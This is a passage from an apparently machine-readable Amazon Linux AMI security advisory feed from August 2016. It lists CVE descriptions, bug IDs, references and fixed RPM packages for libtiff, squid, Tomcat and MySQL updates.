The putcontig8bitCIELab function in tif_getimage.c in LibTIFF 4.0.6 allows remote attackers to cause a denial of service (out-of-bounds read) via a packed TIFF image.
1294427:
CVE-2015-8683 libtiff: Out-of-bounds when reading CIE Lab image format files
CVE-2015-8668:
Heap-based buffer overflow in the PackBitsPreEncode function in tif_packbits.c in bmp2tiff in libtiff 4.0.6 and earlier allows remote attackers to execute arbitrary code or cause a denial of service via a large width field in a BMP image.
1294425:
CVE-2015-8668 libtiff: OOB read in bmp2tiff
CVE-2015-8665:
tif_getimage.c in LibTIFF 4.0.6 allows remote attackers to cause a denial of service (out-of-bounds read) via the SamplesPerPixel tag in a TIFF image.
1294444:
CVE-2015-8665 libtiff: Out-of-bounds read in tif_getimage.c
CVE-2015-7554:
The _TIFFVGetField function in tif_dir.c in libtiff 4.0.6 allows attackers to cause a denial of service (invalid memory write and crash) or possibly have unspecified other impact via crafted field data in an extension tag in a TIFF image.
1294417:
CVE-2015-7554 libtiff: Invalid-write in _TIFFVGetField() when parsing some extension tags
CVE-2015-1547:
The NeXTDecode function in tif_next.c in LibTIFF allows remote attackers to cause a denial of service (uninitialized memory access) via a crafted TIFF image, as demonstrated by libtiff5.tif.
1190709:
CVE-2015-1547 libtiff: use of uninitialized memory in NeXTDecode
CVE-2014-9655:
The (1) putcontig8bitYCbCr21tile function in tif_getimage.c or (2) NeXTDecode function in tif_next.c in LibTIFF allows remote attackers to cause a denial of service (uninitialized memory access) via a crafted TIFF image, as demonstrated by libtiff-cvs-1.tif and libtiff-cvs-2.tif.
1190703:
CVE-2014-9655 libtiff: use of uninitialized memory in putcontig8bitYCbCr21tile and NeXTDecode
CVE-2014-9330:
A flaw was discovered in the bmp2tiff utility. By tricking a user into processing a specially crafted file, a remote attacker could exploit this flaw to cause a crash or memory corruption and, possibly, execute arbitrary code with the privileges of the user running the libtiff tool.
1177893:
CVE-2014-9330 libtiff: Out-of-bounds reads followed by a crash in bmp2tiff
CVE-2014-8130:
1185817:
CVE-2014-8130 libtiff: divide by zero in the tiffdither tool
CVE-2014-8129:
1185815:
CVE-2014-8129 libtiff: out-of-bounds read/write with malformed TIFF image in tiff2pdf
CVE-2014-8127:
1185805:
CVE-2014-8127 libtiff: out-of-bounds read with malformed TIFF image in multiple tools
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8127" title="" id="CVE-2014-8127" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8129" title="" id="CVE-2014-8129" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8130" title="" id="CVE-2014-8130" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9330" title="" id="CVE-2014-9330" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9655" title="" id="CVE-2014-9655" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1547" title="" id="CVE-2015-1547" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7554" title="" id="CVE-2015-7554" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8665" title="" id="CVE-2015-8665" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8668" title="" id="CVE-2015-8668" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8683" title="" id="CVE-2015-8683" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8781" title="" id="CVE-2015-8781" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8782" title="" id="CVE-2015-8782" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8783" title="" id="CVE-2015-8783" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8784" title="" id="CVE-2015-8784" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3632" title="" id="CVE-2016-3632" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3945" title="" id="CVE-2016-3945" type="cve" /><reference 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3990" title="" id="CVE-2016-3990" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3991" title="" id="CVE-2016-3991" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5320" title="" id="CVE-2016-5320" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libtiff-devel" version="4.0.3" release="25.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-devel-4.0.3-25.27.amzn1.x86_64.rpm</filename></package><package name="libtiff" version="4.0.3" release="25.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-4.0.3-25.27.amzn1.x86_64.rpm</filename></package><package name="libtiff-static" version="4.0.3" release="25.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-static-4.0.3-25.27.amzn1.x86_64.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="25.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-debuginfo-4.0.3-25.27.amzn1.x86_64.rpm</filename></package><package name="libtiff-devel" version="4.0.3" release="25.27.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-devel-4.0.3-25.27.amzn1.i686.rpm</filename></package><package name="libtiff" version="4.0.3" release="25.27.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-4.0.3-25.27.amzn1.i686.rpm</filename></package><package name="libtiff-static" version="4.0.3" release="25.27.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-static-4.0.3-25.27.amzn1.i686.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="25.27.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-debuginfo-4.0.3-25.27.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-734</id><title>Amazon 
Linux AMI 2014.03 - ALAS-2016-734: important priority package update for compat-libtiff3</title><issued date="2016-08-17 13:30:00" /><updated date="2016-08-17 13:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-5320:
1346687:
CVE-2016-5320 libtiff: Out-of-bounds write in PixarLogDecode() function in tif_pixarlog.c
CVE-2016-3990:
1326246:
CVE-2016-3990 libtiff: out-of-bounds write in horizontalDifference8()
CVE-2015-8784:
The NeXTDecode function in tif_next.c in LibTIFF allows remote attackers to cause a denial of service (out-of-bounds write) via a crafted TIFF image, as demonstrated by libtiff5.tif.
1301652:
CVE-2015-8784 libtiff: out-of-bound write in NeXTDecode()
CVE-2015-8783:
tif_luv.c in libtiff allows attackers to cause a denial of service (out-of-bounds reads) via a crafted TIFF image.
1301649:
CVE-2015-8781 CVE-2015-8782 CVE-2015-8783 libtiff: invalid assertion
CVE-2015-8782:
tif_luv.c in libtiff allows attackers to cause a denial of service (out-of-bounds writes) via a crafted TIFF image, a different vulnerability than CVE-2015-8781.
1301649:
CVE-2015-8781 CVE-2015-8782 CVE-2015-8783 libtiff: invalid assertion
CVE-2015-8781:
tif_luv.c in libtiff allows attackers to cause a denial of service (out-of-bounds write) via an invalid number of samples per pixel in a LogL compressed TIFF image, a different vulnerability than CVE-2015-8782.
1301649:
CVE-2015-8781 CVE-2015-8782 CVE-2015-8783 libtiff: invalid assertion
CVE-2015-8683:
The putcontig8bitCIELab function in tif_getimage.c in LibTIFF 4.0.6 allows remote attackers to cause a denial of service (out-of-bounds read) via a packed TIFF image.
1294427:
CVE-2015-8683 libtiff: Out-of-bounds when reading CIE Lab image format files
CVE-2015-8665:
tif_getimage.c in LibTIFF 4.0.6 allows remote attackers to cause a denial of service (out-of-bounds read) via the SamplesPerPixel tag in a TIFF image.
1294444:
CVE-2015-8665 libtiff: Out-of-bounds read in tif_getimage.c
CVE-2015-1547:
The NeXTDecode function in tif_next.c in LibTIFF allows remote attackers to cause a denial of service (uninitialized memory access) via a crafted TIFF image, as demonstrated by libtiff5.tif.
1190709:
CVE-2015-1547 libtiff: use of uninitialized memory in NeXTDecode
CVE-2014-9655:
The (1) putcontig8bitYCbCr21tile function in tif_getimage.c or (2) NeXTDecode function in tif_next.c in LibTIFF allows remote attackers to cause a denial of service (uninitialized memory access) via a crafted TIFF image, as demonstrated by libtiff-cvs-1.tif and libtiff-cvs-2.tif.
1190703:
CVE-2014-9655 libtiff: use of uninitialized memory in putcontig8bitYCbCr21tile and NeXTDecode
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9655" title="" id="CVE-2014-9655" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1547" title="" id="CVE-2015-1547" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8665" title="" id="CVE-2015-8665" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8683" title="" id="CVE-2015-8683" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8781" title="" id="CVE-2015-8781" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8782" title="" id="CVE-2015-8782" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8783" title="" id="CVE-2015-8783" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8784" title="" id="CVE-2015-8784" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3990" title="" id="CVE-2016-3990" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5320" title="" id="CVE-2016-5320" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="compat-libtiff3" version="3.9.4" release="18.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/compat-libtiff3-3.9.4-18.14.amzn1.x86_64.rpm</filename></package><package name="compat-libtiff3-debuginfo" version="3.9.4" release="18.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/compat-libtiff3-debuginfo-3.9.4-18.14.amzn1.x86_64.rpm</filename></package><package name="compat-libtiff3" version="3.9.4" release="18.14.amzn1" epoch="0" arch="i686"><filename>Packages/compat-libtiff3-3.9.4-18.14.amzn1.i686.rpm</filename></package><package name="compat-libtiff3-debuginfo" version="3.9.4" release="18.14.amzn1" epoch="0" 
arch="i686"><filename>Packages/compat-libtiff3-debuginfo-3.9.4-18.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-735</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-735: medium priority package update for squid</title><issued date="2016-08-17 13:30:00" /><updated date="2016-08-17 13:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-5408:
It was found that the fix for CVE-2016-4051 released via RHSA-2016:1138 did not properly prevent the stack overflow in the munge_other_line() function. A remote attacker could send specially crafted data to the Squid proxy, which would exploit the cachemgr CGI utility, possibly triggering execution of arbitrary code.
1359203:
CVE-2016-5408 squid: Buffer overflow vulnerability in cachemgr.cgi tool
CVE-2016-4051:
A buffer overflow flaw was found in the way the Squid cachemgr.cgi utility processed remotely relayed Squid input. When the CGI interface utility is used, a remote attacker could possibly use this flaw to execute arbitrary code.
1329126:
CVE-2016-4051 squid: buffer overflow in cachemgr.cgi
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4051" title="" id="CVE-2016-4051" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5408" title="" id="CVE-2016-5408" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="squid-debuginfo" version="3.1.23" release="16.22.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-debuginfo-3.1.23-16.22.amzn1.x86_64.rpm</filename></package><package name="squid" version="3.1.23" release="16.22.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-3.1.23-16.22.amzn1.x86_64.rpm</filename></package><package name="squid" version="3.1.23" release="16.22.amzn1" epoch="7" arch="i686"><filename>Packages/squid-3.1.23-16.22.amzn1.i686.rpm</filename></package><package name="squid-debuginfo" version="3.1.23" release="16.22.amzn1" epoch="7" arch="i686"><filename>Packages/squid-debuginfo-3.1.23-16.22.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-736</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-736: medium priority package update for tomcat7 tomcat8</title><issued date="2016-08-17 13:30:00" /><updated date="2016-08-17 13:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-3092:
A denial of service vulnerability was identified in Commons FileUpload that occurred when the length of the multipart boundary was just below the size of the buffer (4096 bytes) used to read the uploaded file if the boundary was the typical tens of bytes long.
1349468:
CVE-2016-3092 tomcat: Usage of vulnerable FileUpload package can result in denial of service
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3092" title="" id="CVE-2016-3092" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat7-servlet-3.0-api" version="7.0.70" release="1.18.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-servlet-3.0-api-7.0.70-1.18.amzn1.noarch.rpm</filename></package><package name="tomcat7-docs-webapp" version="7.0.70" release="1.18.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-docs-webapp-7.0.70-1.18.amzn1.noarch.rpm</filename></package><package name="tomcat7-log4j" version="7.0.70" release="1.18.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-log4j-7.0.70-1.18.amzn1.noarch.rpm</filename></package><package name="tomcat7-jsp-2.2-api" version="7.0.70" release="1.18.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-jsp-2.2-api-7.0.70-1.18.amzn1.noarch.rpm</filename></package><package name="tomcat7-javadoc" version="7.0.70" release="1.18.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-javadoc-7.0.70-1.18.amzn1.noarch.rpm</filename></package><package name="tomcat7-admin-webapps" version="7.0.70" release="1.18.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-admin-webapps-7.0.70-1.18.amzn1.noarch.rpm</filename></package><package name="tomcat7-el-2.2-api" version="7.0.70" release="1.18.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-el-2.2-api-7.0.70-1.18.amzn1.noarch.rpm</filename></package><package name="tomcat7-webapps" version="7.0.70" release="1.18.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-webapps-7.0.70-1.18.amzn1.noarch.rpm</filename></package><package name="tomcat7-lib" version="7.0.70" release="1.18.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-lib-7.0.70-1.18.amzn1.noarch.rpm</filename></package><package name="tomcat7" version="7.0.70" release="1.18.amzn1" epoch="0" 
arch="noarch"><filename>Packages/tomcat7-7.0.70-1.18.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.0.36" release="1.62.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.0.36-1.62.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.0.36" release="1.62.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.0.36-1.62.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.0.36" release="1.62.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.0.36-1.62.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.0.36" release="1.62.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.0.36-1.62.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.0.36" release="1.62.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.0.36-1.62.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.0.36" release="1.62.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.0.36-1.62.amzn1.noarch.rpm</filename></package><package name="tomcat8-log4j" version="8.0.36" release="1.62.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.0.36-1.62.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.0.36" release="1.62.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.0.36-1.62.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.0.36" release="1.62.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.0.36-1.62.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.0.36" release="1.62.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.0.36-1.62.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" 
type="security" from="linux-security@amazon.com"><id>ALAS-2016-737</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-737: important priority package update for mysql56</title><issued date="2016-08-17 13:30:00" /><updated date="2016-08-17 13:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-5440:
Unspecified vulnerability in Oracle MySQL 5.5.49 and earlier, 5.6.30 and earlier, and 5.7.12 and earlier and MariaDB before 5.5.50, 10.0.x before 10.0.26, and 10.1.x before 10.1.15 allows remote administrators to affect availability via vectors related to Server: RBR.
1358218:
CVE-2016-5440 mysql: unspecified vulnerability in subcomponent: Server: RBR (CPU July 2016)
CVE-2016-5439:
Unspecified vulnerability in Oracle MySQL 5.6.30 and earlier and 5.7.12 and earlier allows remote administrators to affect availability via vectors related to Server: Privileges.
1358216:
CVE-2016-5439 mysql: unspecified vulnerability in subcomponent: Server: Privileges (CPU July 2016)
CVE-2016-3615:
Unspecified vulnerability in Oracle MySQL 5.5.49 and earlier, 5.6.30 and earlier, and 5.7.12 and earlier and MariaDB before 5.5.50, 10.0.x before 10.0.26, and 10.1.x before 10.1.15 allows remote authenticated users to affect availability via vectors related to Server: DML.
1358212:
CVE-2016-3615 mysql: unspecified vulnerability in subcomponent: Server: DML (CPU July 2016)
CVE-2016-3614:
Unspecified vulnerability in Oracle MySQL 5.6.30 and earlier and 5.7.12 and earlier allows remote authenticated users to affect availability via vectors related to Server: Security: Encryption.
1358211:
CVE-2016-3614 mysql: unspecified vulnerability in subcomponent: Server: Security: Encryption (CPU July 2016)
CVE-2016-3521:
Unspecified vulnerability in Oracle MySQL 5.5.49 and earlier, 5.6.30 and earlier, and 5.7.12 and earlier and MariaDB before 5.5.50, 10.0.x before 10.0.26, and 10.1.x before 10.1.15 allows remote authenticated users to affect availability via vectors related to Server: Types.
1358209:
CVE-2016-3521 mysql: unspecified vulnerability in subcomponent: Server: Types (CPU July 2016)
CVE-2016-3501:
Unspecified vulnerability in Oracle MySQL 5.6.30 and earlier and 5.7.12 and earlier allows remote authenticated users to affect availability via vectors related to Server: Optimizer.
1358207:
CVE-2016-3501 mysql: unspecified vulnerability in subcomponent: Server: Optimizer (CPU July 2016)
CVE-2016-3486:
Unspecified vulnerability in Oracle MySQL 5.6.30 and earlier and 5.7.12 and earlier allows remote authenticated users to affect availability via vectors related to Server: FTS.
1358206:
CVE-2016-3486 mysql: unspecified vulnerability in subcomponent: Server: FTS (CPU July 2016)
CVE-2016-3477:
Unspecified vulnerability in Oracle MySQL 5.5.49 and earlier, 5.6.30 and earlier, and 5.7.12 and earlier and MariaDB before 5.5.50, 10.0.x before 10.0.26, and 10.1.x before 10.1.15 allows local users to affect confidentiality, integrity, and availability via vectors related to Server: Parser.
1358205:
CVE-2016-3477 mysql: unspecified vulnerability in subcomponent: Server: Parser (CPU July 2016)
CVE-2016-3459:
Unspecified vulnerability in Oracle MySQL 5.6.30 and earlier and 5.7.12 and earlier and MariaDB 10.0.x before 10.0.25 and 10.1.x before 10.1.14 allows remote administrators to affect availability via vectors related to Server: InnoDB.
1358202:
CVE-2016-3459 mysql: unspecified vulnerability in subcomponent: Server: InnoDB (CPU July 2016)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3459" title="" id="CVE-2016-3459" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3477" title="" id="CVE-2016-3477" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3486" title="" id="CVE-2016-3486" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3501" title="" id="CVE-2016-3501" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3521" title="" id="CVE-2016-3521" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3614" title="" id="CVE-2016-3614" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3615" title="" id="CVE-2016-3615" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5439" title="" id="CVE-2016-5439" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5440" title="" id="CVE-2016-5440" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql56-test" version="5.6.32" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-test-5.6.32-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql56-libs" version="5.6.32" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-libs-5.6.32-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql56" version="5.6.32" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-5.6.32-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql56-devel" version="5.6.32" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-devel-5.6.32-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded" version="5.6.32" release="1.16.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/mysql56-embedded-5.6.32-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql56-errmsg" version="5.6.32" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-errmsg-5.6.32-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql56-server" version="5.6.32" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-server-5.6.32-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.32" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-devel-5.6.32-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql56-bench" version="5.6.32" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-bench-5.6.32-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql56-common" version="5.6.32" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-common-5.6.32-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.32" release="1.16.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-debuginfo-5.6.32-1.16.amzn1.x86_64.rpm</filename></package><package name="mysql56-common" version="5.6.32" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-common-5.6.32-1.16.amzn1.i686.rpm</filename></package><package name="mysql56-test" version="5.6.32" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-test-5.6.32-1.16.amzn1.i686.rpm</filename></package><package name="mysql56-devel" version="5.6.32" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-devel-5.6.32-1.16.amzn1.i686.rpm</filename></package><package name="mysql56-libs" version="5.6.32" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-libs-5.6.32-1.16.amzn1.i686.rpm</filename></package><package name="mysql56-server" version="5.6.32" release="1.16.amzn1" epoch="0" 
arch="i686"><filename>Packages/mysql56-server-5.6.32-1.16.amzn1.i686.rpm</filename></package><package name="mysql56" version="5.6.32" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-5.6.32-1.16.amzn1.i686.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.32" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-devel-5.6.32-1.16.amzn1.i686.rpm</filename></package><package name="mysql56-errmsg" version="5.6.32" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-errmsg-5.6.32-1.16.amzn1.i686.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.32" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-debuginfo-5.6.32-1.16.amzn1.i686.rpm</filename></package><package name="mysql56-embedded" version="5.6.32" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-5.6.32-1.16.amzn1.i686.rpm</filename></package><package name="mysql56-bench" version="5.6.32" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-bench-5.6.32-1.16.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-738</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-738: important priority package update for mysql55</title><issued date="2016-08-17 13:30:00" /><updated date="2016-08-17 13:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-5444:
Unspecified vulnerability in Oracle MySQL 5.5.48 and earlier, 5.6.29 and earlier, and 5.7.11 and earlier and MariaDB before 5.5.49, 10.0.x before 10.0.25, and 10.1.x before 10.1.14 allows remote attackers to affect confidentiality via vectors related to Server: Connection.
1358223:
CVE-2016-5444 mysql: unspecified vulnerability in subcomponent: Server: Connection (CPU July 2016)
CVE-2016-5440:
Unspecified vulnerability in Oracle MySQL 5.5.49 and earlier, 5.6.30 and earlier, and 5.7.12 and earlier and MariaDB before 5.5.50, 10.0.x before 10.0.26, and 10.1.x before 10.1.15 allows remote administrators to affect availability via vectors related to Server: RBR.
1358218:
CVE-2016-5440 mysql: unspecified vulnerability in subcomponent: Server: RBR (CPU July 2016)
CVE-2016-3615:
Unspecified vulnerability in Oracle MySQL 5.5.49 and earlier, 5.6.30 and earlier, and 5.7.12 and earlier and MariaDB before 5.5.50, 10.0.x before 10.0.26, and 10.1.x before 10.1.15 allows remote authenticated users to affect availability via vectors related to Server: DML.
1358212:
CVE-2016-3615 mysql: unspecified vulnerability in subcomponent: Server: DML (CPU July 2016)
CVE-2016-3521:
Unspecified vulnerability in Oracle MySQL 5.5.49 and earlier, 5.6.30 and earlier, and 5.7.12 and earlier and MariaDB before 5.5.50, 10.0.x before 10.0.26, and 10.1.x before 10.1.15 allows remote authenticated users to affect availability via vectors related to Server: Types.
1358209:
CVE-2016-3521 mysql: unspecified vulnerability in subcomponent: Server: Types (CPU July 2016)
CVE-2016-3477:
Unspecified vulnerability in Oracle MySQL 5.5.49 and earlier, 5.6.30 and earlier, and 5.7.12 and earlier and MariaDB before 5.5.50, 10.0.x before 10.0.26, and 10.1.x before 10.1.15 allows local users to affect confidentiality, integrity, and availability via vectors related to Server: Parser.
1358205:
CVE-2016-3477 mysql: unspecified vulnerability in subcomponent: Server: Parser (CPU July 2016)
CVE-2016-3452:
Unspecified vulnerability in Oracle MySQL 5.5.48 and earlier, 5.6.29 and earlier, and 5.7.10 and earlier and MariaDB before 5.5.49, 10.0.x before 10.0.25, and 10.1.x before 10.1.14 allows remote attackers to affect confidentiality via vectors related to Server: Security: Encryption.
1358201:
CVE-2016-3452 mysql: unspecified vulnerability in subcomponent: Server: Security: Encryption (CPU July 2016)
CVE-2016-2047:
The ssl_verify_server_cert function in sql-common/client.c in MariaDB before 5.5.47, 10.0.x before 10.0.23, and 10.1.x before 10.1.10; Oracle MySQL 5.5.48 and earlier, 5.6.29 and earlier, and 5.7.11 and earlier; and Percona Server do not properly verify that the server hostname matches a domain name in the subject&#039;s Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a &quot;/CN=&quot; string in a field in a certificate, as demonstrated by &quot;/OU=/CN=bar.com/CN=foo.com.&quot;
It was found that the MariaDB client library did not properly check host names against server identities noted in the X.509 certificates when establishing secure connections using TLS/SSL. A man-in-the-middle attacker could possibly use this flaw to impersonate a server to a client.
1301874:
CVE-2016-2047 mysql: ssl-validate-cert incorrect hostname check
CVE-2016-0666:
Unspecified vulnerability in Oracle MySQL 5.5.48 and earlier, 5.6.29 and earlier, and 5.7.11 and earlier and MariaDB before 5.5.49, 10.0.x before 10.0.25, and 10.1.x before 10.1.14 allows local users to affect availability via vectors related to Security: Privileges.
Unspecified vulnerability in Oracle MySQL 5.5.48 and earlier, 5.6.29 and earlier, and 5.7.11 and earlier allows local users to affect availability via vectors related to Security: Privileges.
1329270:
